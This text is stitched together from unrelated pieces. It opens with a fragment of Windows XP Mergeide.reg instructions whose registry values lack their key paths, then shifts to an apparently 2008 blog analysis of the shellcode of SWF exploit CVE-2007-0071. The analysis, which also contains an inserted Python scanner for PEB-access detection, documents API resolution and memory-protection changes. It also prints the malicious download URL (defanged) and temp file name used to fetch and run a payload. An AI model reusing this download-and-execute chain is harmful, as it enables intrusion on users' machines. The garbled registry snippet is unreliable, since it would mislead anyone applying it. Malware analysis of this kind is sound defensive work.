Windows Registry Editor Version 5.00
































;Add driver for Atapi (requires Atapi.sys in Drivers directory)

"Group"="SCSI miniport"
"DisplayName"="Standard IDE/ESDI Hard Disk Controller"

;Add driver for intelide (requires intelide.sys in drivers directory)

"Group"="System Bus Extender"

;Add driver for Pciide (requires Pciide.sys and Pciidex.sys in Drivers directory)

"Group"="System Bus Extender"
********** End copy here **********

2. Extract the Atapi.sys, Intelide.sys, Pciide.sys, and Pciidex.sys files from the %SystemRoot%\Driver Cache\I386\ file, or copy the files to the %SystemRoot%\System32\Drivers folder.
3. In Microsoft Windows Explorer, right-click the Mergeide.reg file in the floppy drive, and then click Merge.

Windows XP displays the following message:
Are you sure you want to add the information in A:\Mergeide.reg to the registry?
Click Yes.

After the import process is completed, Windows XP displays another message:
Information from A:\Mergeide.reg was successfully entered into the registry.
4. Quit Windows XP, turn off the computer, and then move the system disk to the other test computer, the one that previously produced a Stop 0x0000007B error, and then test to see if you can successfully start the second computer.


Saturday, June 7, 2008

Analysis of the shellcode of SWF Exploit CVE-2007-0071

After the decryption code, it will search for the base address of kernel32.dll to get the addresses of the APIs that it will need.

As shown in the illustration, it uses the Process Environment Block (PEB) to get kernel32.dll's base address.

Here is a great explanation of the PEB.

It goes to fs:[30] as its entry point to the PEB.

Here is a very good reference on what the values in fs point to. Basically, it is more about the Thread Information Block (TIB).
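From the detection side, the fs:[30] access described above can be spotted statically. The scanner below is an added example, not part of the original analysis: it flags the common 32-bit instruction encodings that read the PEB pointer from fs:[0x30] and raises confidence when a PEB->Ldr dereference follows. The offset 0x0C for Ldr comes from the documented 32-bit PEB layout, and the function names and sample bytes are constructed for this example.

```python
FS_PREFIX = 0x64                  # FS segment-override prefix (32-bit x86)
PEB_DISP32 = b"\x30\x00\x00\x00"  # absolute offset 0x30 in the TIB

def peb_read_len(buf, i):
    """Length of an instruction at buf[i] that reads fs:[0x30], or 0 if none."""
    if buf[i] != FS_PREFIX or i + 2 >= len(buf):
        return 0
    op, modrm = buf[i + 1], buf[i + 2]
    if op == 0xA1:                                   # mov eax, fs:[0x30]
        return 6 if buf[i + 2:i + 6] == PEB_DISP32 else 0
    mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
    if op not in (0x8B, 0xFF) or (op == 0xFF and reg != 6):
        return 0                                     # only mov r32,r/m32 and push r/m32
    if mod == 0 and rm == 5 and buf[i + 3:i + 7] == PEB_DISP32:
        return 7                                     # fs:[0x30] encoded as disp32
    if mod == 1 and rm != 4 and buf[i + 3:i + 4] == b"\x30":
        return 4                                     # fs:[reg+0x30], register zeroed first
    return 0

def reads_ldr(window):
    """True if window contains mov r32,[r32+0x0C], i.e. the PEB->Ldr dereference."""
    return any(window[j] == 0x8B and window[j + 1] >> 6 == 1
               and window[j + 1] & 7 != 4 and window[j + 2] == 0x0C
               for j in range(len(window) - 2))

def find_peb_access(buf, lookahead=16):
    """Return (offset, confidence) for every fs:[0x30] read found in buf."""
    hits = []
    for i in range(len(buf)):
        n = peb_read_len(buf, i)
        if n:
            nxt = buf[i + n:i + n + lookahead]
            hits.append((i, "high" if reads_ldr(nxt) else "low"))
    return hits

# Constructed sample bytes (not taken from the analysed SWF).
SAMPLE = bytes.fromhex(
    "9090" "64a130000000" "8b400c" "8b701c"   # mov eax,fs:[30h]; Ldr; module list
    + "00" * 20 + "648b1d30000000"            # isolated fs:[30h] read, no Ldr follow-up
    + "00" * 20 + "33c0" "648b4030" "8b400c"  # xor eax,eax; mov eax,fs:[eax+30h]; Ldr
)

if __name__ == "__main__":
    for off, conf in find_peb_access(SAMPLE):
        print(f"offset {off:#06x}: PEB pointer read, confidence {conf}")
```

A "low" hit on its own is weak evidence, since the same seven bytes can occur in compressed or random data; the follow-up Ldr read is what makes the match worth triaging.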

Once it gets the base address of kernel32.dll in memory, it will get all the API addresses it needs in the export address table.

kernel32.dll base address in XP is 77E60000.
(I reckon it depends on the version of XP, I will double check on this in a few days.)

So below is a list of APIs that it gets



It will also get the import table address. In this case it gets API addresses from the imported DLL of kernel32.dll, which is ntdll.dll.

It gets the addresses of the following APIs

NtCreateProcessEx - ntdll.ZwCreateProcessEx
NtWriteVirtualMemory - ntdll.ZwWriteVirtualMemory

Below you can see that it calls kernel32.LoadLibraryA API to load the urlmon.dll.
It used the JMP instruction instead of a direct CALL instruction to the API.

When this is debugged and you go inside kernel32.dll, you will see this in the stack.

It finds the address of the API urlmon.URLDownloadToFileA in urlmon.dll.

Then it changes the memory protection on the address of ntdll.ZwCreateProcessEx, ntdll.ZwWriteVirtualMemory and kernel32.CreateProcessInternalW to PAGE_EXECUTE_READ.

Then it gets the temporary path of the system and deletes the file orz.exe in the temporary path of the system to make sure the file will be the latest version.

In the figure below you can see that it calls the API urlmon.URLDownloadToFileA with the following parameters

HRESULT URLDownloadToFile(
    LPUNKNOWN pCaller,
    LPCTSTR szURL,
    LPCTSTR szFileName,
    DWORD dwReserved,
    LPBINDSTATUSCALLBACK lpfnCB);

Relevant values

szURL = hxxp://mmlan . com . cn / mm . exe
szFileName = C:\DOCUME~1\username\LOCALS~1\Temp\ orz.exe

Then it executes the file using the kernel32.CreateProcessInternalA API.

That's it.

Enjoy your weekend.